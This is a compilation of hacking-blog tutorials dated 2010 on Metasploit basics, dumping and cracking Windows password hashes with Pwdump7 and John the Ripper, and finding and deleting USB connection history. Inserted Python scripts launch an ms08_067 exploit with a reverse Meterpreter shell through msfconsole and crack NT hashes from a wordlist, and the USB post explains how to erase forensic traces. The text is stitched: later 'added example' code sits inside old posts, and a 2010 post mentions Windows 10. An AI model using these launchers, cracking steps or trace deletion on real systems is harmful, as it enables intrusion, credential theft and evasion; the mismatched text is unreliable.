
Metasploit | A guide for beginners and newbies.

Saturday, November 06, 2010
If you are interested in hacking, I feel the Metasploit Framework is essential to know and to use. It is used by security researchers, pentesters, hackers, script kiddies and so on. In this tutorial I will discuss a few basics of Metasploit and its architecture. So let's start....
I recommend that readers proceed with this post only if they abide by the blog's Disclaimer; otherwise, leave this page now.
Metasploit

What is metasploit?

It is an exploitation framework written in Ruby, used for developing and executing exploits against a remote host after its vulnerabilities have been assessed. It ships with a large collection of ready-made exploit, payload and auxiliary modules and integrates with external tools such as nmap (for example through db_nmap in msfconsole). It was developed primarily for penetration testing, but it has become a must-have tool for attackers as well.

Note:All the screen shots in this post are from Windows OS.

Architecture:
(Architecture diagram not reproduced here. Image credit: HD Moore)

Basic Terms:

1. Exploits:
An exploit is the vehicle: code that abuses a specific vulnerability or flaw in the target to get the framework's code running there. On its own it only opens the door; what runs afterwards is the payload.

2. Payload:
The payload is the code the exploit delivers and runs on the target once the vulnerability has been triggered, for example a command shell, a VNC server or Meterpreter. The same exploit can be paired with different payloads.

3. Auxiliary:
Auxiliary modules are the parts of the framework that do not deliver a payload: port and service scanners, sniffers, enumeration and fuzzing modules, and so on.

4. Meterpreter:
Meterpreter is an advanced payload that is injected into the memory of a process on the exploited system, so no new process is started and nothing is written to disk. From there it can later be migrated into any other process by its PID (Process ID).

5. Encoders:
Encoders transform the payload, originally to remove bytes the exploit cannot use (such as null bytes) and to change its appearance. They are often described as a way to get past anti-virus, but a decoder stub followed by an encoded payload is itself a well-known signature, so encoding alone should not be expected to make a payload undetectable.

6. Nops:
NOP generators produce sequences of no-operation instructions (NOP sleds) that pad an exploit so that execution lands reliably on the payload. Because a plain run of 0x90 bytes is an obvious IDS signature, the generators can emit varied instruction sequences that behave like NOPs.


7. Plugins:
Plugins extend the functionality of the console.

Basic Commands:

1. help:
As the name suggests, it lists the available commands with a short description of each.

2. search:
Use this when you want an exploit but do not know its exact name. For example, "search windows" lists every module with windows in its name or description, as shown in the image below.

3. use:
Once you have found the exploit you want, this command selects it as the current module, as shown in the image below.


4. set:
Sets an option (such as RHOST or PAYLOAD) for the currently selected module only, as shown in the image below.

5. show options:
Lists the options of the current module, which of them are required, and their current values: the target host, the port to use, and so on.

6. setg:
Same as "set", but the "g" stands for global: the value is kept for the whole session and applies to every module you switch to, which is convenient for options like LHOST.

7. show:
"show" on its own lists all exploits, payloads and auxiliary modules at once, which is a lot of output; "show payloads", "show exploits" and so on list only that type, as shown in the image below. With a module selected, "show payloads" lists only the payloads compatible with it.
 



8. info:
Displays the details of an exploit, payload or auxiliary module: author, targets, options and a description.

9. exploit/run:
Once everything is set, this runs the module. "exploit" is used for exploit modules and "run" for auxiliary ones (msfconsole accepts either).

10. sessions: sessions -l, sessions -i <id>:
"sessions -l" lists the sessions opened by successful exploits, and "sessions -i <id>" interacts with the session that has that ID.

11. ps:
Inside a running Meterpreter session, "ps" lists the processes running on the exploited system, with their PIDs.

12. migrate:
The process Meterpreter was injected into is sometimes short-lived (a browser tab or a service that is about to crash or be restarted), so "migrate <pid>" moves Meterpreter into another process chosen from the "ps" output, typically a long-lived one such as explorer.exe.
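The commands above are normally typed one at a time, but msfconsole also accepts them from a resource script (msfconsole -r file.rc). The following is an added example, not code from the original post or from the Metasploit project: it builds such a script in the order the commands were explained (setg for session-wide options, use, set, show options, exploit -j, sessions -l) and refuses to emit one with the required options missing. The module name, payload and the 192.0.2.x addresses (RFC 5737 documentation range) are placeholders; substitute the module matching the vulnerability you actually assessed.

```python
"""Added example: build an msfconsole resource script from the commands
explained above and optionally hand it to msfconsole -q -r.

The module, payload and addresses used in __main__ are placeholders chosen
for illustration; they are not from the original post."""
import shutil
import subprocess
import sys
import tempfile

# Options every reverse-connect payload needs; checked before writing the
# script so the run does not fail half-way with "LHOST is not set".
REQUIRED_GLOBAL = ("LHOST",)
REQUIRED_MODULE = ("RHOSTS",)


def build_resource_script(module, payload, global_opts, module_opts):
    """Return the text of an .rc file.

    setg values survive a later "use" of another module, so session-wide
    settings go first; "set" values belong to the selected module only.
    """
    missing = [k for k in REQUIRED_GLOBAL if k not in global_opts]
    missing += [k for k in REQUIRED_MODULE if k not in module_opts]
    if missing:
        raise ValueError("missing required options: " + ", ".join(missing))
    lines = []
    for key, value in sorted(global_opts.items()):
        lines.append(f"setg {key} {value}")   # global: kept for the session
    lines.append(f"use {module}")
    lines.append(f"set PAYLOAD {payload}")
    for key, value in sorted(module_opts.items()):
        lines.append(f"set {key} {value}")    # module-scoped
    lines.append("show options")              # sanity check before running
    lines.append("exploit -j")                # -j: run as a background job
    lines.append("sessions -l")               # list whatever came back
    return "\n".join(lines) + "\n"


def run_resource_script(text):
    """Write the script to a temp file and run msfconsole -q -r on it.

    Returns msfconsole's exit status, or None when it is not installed.
    """
    msf = shutil.which("msfconsole")
    if msf is None:
        return None
    with tempfile.NamedTemporaryFile("w", suffix=".rc", delete=False) as fh:
        fh.write(text)
        path = fh.name
    return subprocess.call([msf, "-q", "-r", path])


if __name__ == "__main__":
    rc = build_resource_script(
        "exploit/windows/smb/ms08_067_netapi",   # placeholder module
        "windows/meterpreter/reverse_tcp",       # placeholder payload
        {"LHOST": "192.0.2.1"},                  # attacker, RFC 5737 address
        {"RHOSTS": "192.0.2.10"},                # target, RFC 5737 address
    )
    print(rc)
    if "--run" in sys.argv:                      # only launch when asked
        print("msfconsole exit status:", run_resource_script(rc))
```

Run it without arguments to see the script, and with --run to execute it through msfconsole if it is installed; the RHOSTS/LHOST check is the same "Required" column that "show options" prints, enforced before the run instead of after a failed one.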

You can set up a pentesting environment at home using virtual machines; find out here.

For more information on Metasploit visit here.

"If you find this post useful and informative do post your comment and share it."
Reviewed by Satyajit (Admins, a.k.a Satosys) on Saturday, November 06, 2010

How to use John the Ripper Tutorial and Pwdump7

Wednesday, October 20, 2010
In Microsoft Windows, user account passwords (as hashes) and account information are stored in a registry hive file called SAM. It is located at "%systemroot%\system32\config\SAM", and older versions also keep a backup copy in "%systemroot%\repair". In this post we will see how to extract the hashes with Pwdump7 and crack them with John the Ripper for Windows.

As part of this Windows password hack we will use Pwdump7 to dump the hashes and John the Ripper, a password cracker, to recover the passwords from them. In this John the Ripper tutorial we will keep things simple so that a beginner can follow it.

In Windows 10 and in earlier versions back to Windows XP SP3 the SAM file is held open by the system while Windows is running, so it cannot simply be copied or opened, and the hashes inside it are additionally encrypted with the SYSKEY (boot key) kept in the SYSTEM hive. Pwdump7 reads the raw hive files from disk and undoes that encryption, so in this post I will show you how to retrieve the hashes and crack them.

You may be wondering what SAM stands for?

It expands to Security Accounts Manager, the database that stores the local user credential information.

Requirements:

1. Pwdump7 (Download)

2. John the Ripper (Download)

Procedure:

Step 1. You need administrative privileges. Open a command prompt, change to the directory where pwdump7 is present, run it and follow the on-screen information as shown below.

Step 2. Once all the hashes are displayed on the command prompt screen, copy them into a text file: right-click the title bar, choose Edit > Mark, select the hash lines, press Enter to copy, then paste into Notepad and save. Alternatively, redirect the output straight to a file with "PwDump7.exe > C:\pw-hash.txt". Here I have saved it as pw-hash.txt.

Step 3. Having downloaded John the Ripper for Windows, browse into John's run directory and use the command shown in the image below.

Step 4. The command used above is "C:\JOHN\RUN>john-386 C:/pw-hash.txt --users=Administrator"; the format is "john-386 [hash file path] --users=[username]". Here the hash file path is "C:/pw-hash.txt" and the username is "Administrator", so John will only work on the Administrator's hash.

You can also run "C:\JOHN\RUN>john-386 C:/pw-hash.txt" so that John works on every user in the file. Note that John's default on a pwdump file is the LM hash; on Vista and later LM hashes are no longer stored (the LM field is then the empty marker AAD3B435B51404EEAAD3B435B51404EE), so add --format=NT to crack the NT hashes instead.

If you have a John the Ripper wordlist then you can use wordlist mode as well, which tries each word from the file (optionally with mangling rules) instead of John's default sequence of single-crack, built-in wordlist and incremental (brute-force) modes:

john --wordlist=password.txt pw-hash.txt
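To make clear what the wordlist run above actually does, here is an added example (not code from the post, nor from John the Ripper or Pwdump7) that carries out the same attack on NT hashes in Python: it parses pwdump7-style lines, computes the NT hash (MD4 over the UTF-16-LE password) of every candidate word and looks each account's hash up in that table. MD4 is implemented inline because hashlib builds on OpenSSL 3 often ship without it. The dump lines, usernames and wordlist are constructed for the example, and the NT values in the dump are computed by the script rather than captured from a machine.

```python
"""Added example: a wordlist attack on pwdump-format NT hashes, written out
step by step. Sample dump and wordlist are constructed, not captured."""
import struct

EMPTY_LM = "AAD3B435B51404EEAAD3B435B51404EE"   # LM field when LM is disabled/blank
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"   # NT hash of the empty password


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data):
    """Pure-Python MD4 (RFC 1320); returns the 16-byte digest."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f1 = lambda x, y, z: (x & y) | (~x & z)
    f2 = lambda x, y, z: (x & y) | (x & z) | (y & z)
    f3 = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f1, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (f2, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (f3, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for func, k, order, shifts in rounds:
            for n, idx in enumerate(order):
                a = _rotl((a + func(b, c, d) + x[idx] + k) & 0xFFFFFFFF, shifts[n % 4])
                a, b, c, d = d, a, b, c        # rotate registers for the next step
        h = [(v + w) & 0xFFFFFFFF for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password):
    """NT hash: MD4 of the password encoded as UTF-16-LE, upper-case hex."""
    return md4(password.encode("utf-16-le")).hex().upper()


def parse_pwdump(lines):
    """pwdump format: user:RID:LM_hash:NT_hash:::  -> [(user, rid, lm, nt)]."""
    out = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, rid, lm, nt = line.split(":")[:4]
        out.append((user, int(rid), lm.upper(), nt.upper()))
    return out


def crack(dump_lines, wordlist, users=None):
    """Wordlist attack on the NT hashes, the equivalent of
    john --format=NT --wordlist=... [--users=...]. Returns {user: password}."""
    targets = [t for t in parse_pwdump(dump_lines) if users is None or t[0] in users]
    # Hash every candidate once and look each account up: NT hashes are
    # unsalted, so one hash computation serves every account in the dump.
    table = {nt_hash(w): w for w in wordlist}
    table[EMPTY_NT] = ""                       # blank password needs no wordlist
    return {user: table[nt] for user, _, _, nt in targets if nt in table}


def weak_lm_accounts(dump_lines):
    """Accounts that still carry a real LM hash (far weaker than NT); only the
    empty marker means LM is absent."""
    return [u for u, _, lm, _ in parse_pwdump(dump_lines) if lm != EMPTY_LM]


# Constructed sample dump. NT values are computed here; the LM value on the
# "legacy" line is a made-up placeholder standing in for a real LM hash.
SAMPLE_DUMP = [
    f"Administrator:500:{EMPTY_LM}:{nt_hash('password')}:::",
    f"Guest:501:{EMPTY_LM}:{EMPTY_NT}:::",
    f"alice:1001:{EMPTY_LM}:{nt_hash('Summer2010')}:::",
    f"bob:1002:{EMPTY_LM}:{nt_hash('correct horse battery staple')}:::",
    f"legacy:1003:0123456789ABCDEF0123456789ABCDEF:{nt_hash('legacy')}:::",
]
SAMPLE_WORDLIST = ["123456", "password", "letmein", "Summer2010", "qwerty"]

if __name__ == "__main__":
    for user, pw in crack(SAMPLE_DUMP, SAMPLE_WORDLIST).items():
        print(f"{user}: {pw!r}")
    print("only Administrator:", crack(SAMPLE_DUMP, SAMPLE_WORDLIST, users={"Administrator"}))
    print("accounts still storing an LM hash:", weak_lm_accounts(SAMPLE_DUMP))
```

The users argument mirrors John's --users option from Step 4. The table-lookup structure is the reason a single unsalted NT hash run scales to an entire domain dump at no extra cost, and why bob's passphrase survives: it is simply not in the wordlist.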

I think from this post we have seen how to use John the Ripper for Windows together with Pwdump7.

If you find this post useful then do drop a comment it will be appreciated.
Reviewed by Satyajit (Admins, a.k.a Satosys) on Wednesday, October 20, 2010

How to retrieve USB history and delete them ?(Part-I)

Sunday, July 18, 2010
Well, nowadays we plug many devices into our USB ports: MP3 players, iPods, pen drives and so on. It is also true that these devices are a vector for viruses, trojans, backdoors and the like, which can be lethal at times. Today I am going to discuss how we can keep track of all the USB storage devices that were ever connected to our computer (Windows XP / Vista / 7). This can be very helpful if you find that some data has been stolen from your PC.

The USB history in a PC can be tracked by two methods:

a) By looking directly into the registry.

b) By using a tool.

Let's first start with the registry method.

1. First open Run, type "regedit" and hit Enter.

Note: USB history can be found at two places in the registry:
 --HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB (every USB device, keyed by vendor and product ID)
 --HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR (USB mass-storage devices only, keyed by vendor, product, revision and serial number)

2. A Registry Editor window opens; in it follow the steps shown in the image below.
(Here we look into the second registry path mentioned above, but you can also try the first one.)
In the image above you can see that after I connected a pen drive its information is present in the registry: the subkey name gives the vendor, product and revision, and the subkey under it is the device's serial number. Windows keeps these keys after the device is unplugged, which is why they serve as a history.
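The USBSTOR key names have a fixed layout, so they can be parsed rather than read by eye. The following is an added example, not code from the post or from any of the tools it mentions: it parses the two-level key names (device class\instance ID) into vendor, product, revision and serial, flags instance IDs that Windows generated because the device reported no serial of its own (the second character of such an ID is an "&"), and on Windows can walk the live key with the standard winreg module. The key names in SAMPLE_KEYS are constructed for the example, not captured from a machine.

```python
"""Added example: parse USBSTOR device instance paths and, on Windows,
enumerate the live key. Sample key names are constructed, not captured."""
import sys

USBSTOR = r"SYSTEM\CurrentControlSet\Enum\USBSTOR"


def parse_usbstor(device_class, instance_id):
    """device_class looks like 'Disk&Ven_SanDisk&Prod_Cruzer_Blade&Rev_1.00',
    instance_id like '4C530001230316112153&0' (serial + '&' + interface).

    If the second character of instance_id is '&', Windows generated the ID
    because the device reported no unique serial; such IDs are not unique to
    the physical device and cannot be used to tie a device to a machine."""
    fields = {"type": "", "vendor": "", "product": "", "revision": ""}
    parts = device_class.split("&")
    fields["type"] = parts[0]                  # Disk, CdRom, Other, ...
    for part in parts[1:]:
        for prefix, key in (("Ven_", "vendor"), ("Prod_", "product"), ("Rev_", "revision")):
            if part.startswith(prefix):
                # Windows writes spaces from the device strings as underscores.
                fields[key] = part[len(prefix):].replace("_", " ").strip()
    generated = len(instance_id) > 1 and instance_id[1] == "&"
    fields["serial"] = instance_id if generated else instance_id.split("&")[0]
    fields["serial_from_device"] = not generated
    return fields


def enumerate_usbstor_live():
    """Windows only: walk HKLM\\...\\USBSTOR with winreg and parse every
    device/instance pair, adding FriendlyName and the instance key's last
    write time (100 ns units since 1601, the usual 'last plugged in' hint).
    Returns [] on other platforms so the example runs anywhere."""
    if not sys.platform.startswith("win"):
        return []
    import winreg
    found = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, USBSTOR) as root:
        for i in range(winreg.QueryInfoKey(root)[0]):
            dev = winreg.EnumKey(root, i)
            with winreg.OpenKey(root, dev) as devkey:
                for j in range(winreg.QueryInfoKey(devkey)[0]):
                    inst = winreg.EnumKey(devkey, j)
                    rec = parse_usbstor(dev, inst)
                    with winreg.OpenKey(devkey, inst) as instkey:
                        rec["key_last_write"] = winreg.QueryInfoKey(instkey)[2]
                        try:
                            rec["friendly_name"] = winreg.QueryValueEx(instkey, "FriendlyName")[0]
                        except OSError:
                            rec["friendly_name"] = ""
                    found.append(rec)
    return found


# Constructed examples of what the two key levels look like.
SAMPLE_KEYS = [
    ("Disk&Ven_SanDisk&Prod_Cruzer_Blade&Rev_1.00", "4C530001230316112153&0"),
    ("Disk&Ven_Generic&Prod_Flash_Disk&Rev_8.07", "6&2a5c3f7a&0&000000"),
    ("CdRom&Ven_HL-DT-ST&Prod_DVDRAM_GT30N&Rev_A100", "7&1e4f9b2c&0&000000"),
]


def report(keys):
    """Parse a list of (device_class, instance_id) pairs."""
    return [parse_usbstor(dev, inst) for dev, inst in keys]


if __name__ == "__main__":
    rows = enumerate_usbstor_live() or report(SAMPLE_KEYS)
    for r in rows:
        origin = "device serial" if r["serial_from_device"] else "Windows-generated ID"
        print(f"{r['type']:6} {r['vendor']:10} {r['product']:16} rev {r['revision']:5} {r['serial']} ({origin})")
```

Run on Windows (as an administrator, so the key opens) it lists the real history; elsewhere it falls back to the constructed sample so the parsing logic can still be checked.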

So let's see how we can do this with a tool. The tool we will use is NirSoft's USBDeview. (Download)

1. Download the tool and just run it; it shows all the USB devices that were ever connected to your PC, with serial number, date/time connected and so on.

Note: serial numbers are unique for external devices that report one, but, as you can see, internal devices (and cheap devices that report no serial) share Windows-generated instance IDs instead. You can recognise those because the second character of the ID is an "&".

2. Now select any one of the external devices, right-click it and select Properties. It shows all the details about the device, as shown in the image below.

Now that we have retrieved the USB device history, let's see how we can delete this information.

1. Open the Registry Editor as in the steps above, then follow the on-screen steps shown in the image below. (The USBSTOR subkeys carry permissions that do not let even administrators delete them, so the permissions have to be changed first.)

2. After completing all the steps in the image above you will be able to delete the registry key or subkey.
Doing this removes the traces from USBSTOR, but the device can still be detected from other artifacts (setupapi.log on XP or setupapi.dev.log on Vista and later, the MountedDevices key, and MountPoints2 in each user's NTUSER.DAT), so we will cover that in Part-II.

Note: for Linux you can use USBView (Download), but it only shows the devices currently attached; the history of past connections is in the kernel log (dmesg, /var/log/syslog or the journal).

If you find this post  worthy enough to read do drop a comment  it will be appreciated. :)



Reviewed by Satyajit (Admins, a.k.a Satosys) on Sunday, July 18, 2010